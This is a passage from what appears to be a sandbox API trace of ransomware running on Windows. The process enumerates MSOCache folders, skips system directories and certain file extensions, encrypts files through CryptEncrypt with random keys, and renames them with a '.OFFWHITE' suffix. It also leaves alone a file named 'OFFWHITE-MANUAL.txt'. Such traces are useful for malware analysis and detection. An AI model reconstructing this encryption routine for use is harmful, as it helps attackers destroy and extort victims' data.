Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" [0084.632] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.OFFWHITE" [0084.632] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.offwhite")) returned 1 [0084.633] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 0 [0084.633] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0084.633] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0084.633] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0084.634] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0084.634] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0084.634] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0084.634] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0084.634] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0084.634] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0084.634] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0084.634] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0084.634] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0084.634] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0084.634] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0084.634] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-00A1-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C" [0084.634] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" [0084.634] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" [0084.634] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" [0084.634] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0084.707] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.707] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0084.708] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0084.708] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.708] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2=".") returned 1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="..") returned 1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="...") returned 1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="windows") returned -1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="$recycle.bin") returned 1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="rsa") returned -1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="ntuser.dat") returned 1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="programdata") returned -1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="appdata") returned 1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="program files") returned -1 [0084.708] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="program files (x86)") returned -1 [0084.708] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" [0084.708] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="OneNoteMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" [0084.708] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.708] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.708] PathFindExtensionW (pszPath="OneNoteMUI.msi") returned=".msi" [0084.708] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0084.708] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0084.708] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0084.708] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0084.709] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0084.709] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2=".") returned 1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="..") returned 1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="...") returned 1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="windows") returned -1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="$recycle.bin") returned 1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="rsa") returned -1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="ntuser.dat") returned 1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="programdata") returned -1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="appdata") returned 1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="program files") returned -1 [0084.709] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="program files (x86)") returned -1 [0084.709] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" [0084.709] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="OneNoteMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" [0084.710] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.710] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.710] PathFindExtensionW (pszPath="OneNoteMUI.xml") returned=".xml" [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.710] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.710] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.710] GetProcessHeap () returned 0x500000 [0084.710] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547be8 [0084.710] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.711] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1606) returned 1 [0084.711] GetProcessHeap () returned 0x500000 [0084.711] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.711] GetProcessHeap () returned 0x500000 [0084.711] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.711] GetProcessHeap () returned 0x500000 [0084.711] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.711] GetProcessHeap () returned 0x500000 [0084.711] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.711] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.711] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.711] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.711] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.711] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.711] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.711] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.711] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.711] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.712] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.712] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.712] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.712] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x646, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.712] SetLastError (dwErrCode=0x0) [0084.712] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.298] GetLastError () returned 0x0 [0085.298] GetLastError () returned 0x0 [0085.298] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x746, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.298] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.298] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x846, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.298] WriteFile (in: hFile=0x21c, lpBuffer=0x547be8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547be8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0085.298] GetProcessHeap () returned 0x500000 [0085.298] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x646) returned 0x546980 [0085.298] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.298] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x646, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x646, lpOverlapped=0x0) returned 1 [0085.298] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.298] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x646, lpOverlapped=0x0) returned 1 [0085.299] GetProcessHeap () returned 0x500000 [0085.299] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0085.299] CloseHandle (hObject=0x21c) returned 1 [0085.300] GetProcessHeap () returned 0x500000 [0085.300] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0085.300] GetProcessHeap () returned 0x500000 [0085.300] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0085.300] GetProcessHeap () returned 0x500000 [0085.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0085.301] GetProcessHeap () returned 0x500000 [0085.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0085.301] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" [0085.301] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.OFFWHITE" [0085.301] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.offwhite")) returned 1 [0085.301] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0085.301] lstrcmpiW (lpString1="OnoteLR.cab", lpString2=".") returned 1 [0085.301] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="..") returned 1 [0085.301] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="...") returned 1 [0085.301] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="windows") returned -1 [0085.302] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="$recycle.bin") returned 1 [0085.302] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="rsa") returned -1 [0085.302] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="ntuser.dat") returned 1 [0085.302] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="programdata") returned -1 [0085.302] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="appdata") returned 1 [0085.302] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="program files") returned -1 [0085.302] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="program files (x86)") returned -1 [0085.302] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" [0085.302] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="OnoteLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" [0085.302] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.302] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.302] PathFindExtensionW (pszPath="OnoteLR.cab") returned=".cab" [0085.302] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0085.302] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0085.302] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0085.302] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0085.302] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0085.302] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" [0085.302] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" [0085.302] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.302] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.302] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0085.303] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0085.303] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0085.303] GetProcessHeap () returned 0x500000 [0085.303] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547bf8 [0085.303] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0085.304] GetFileSizeEx (in: 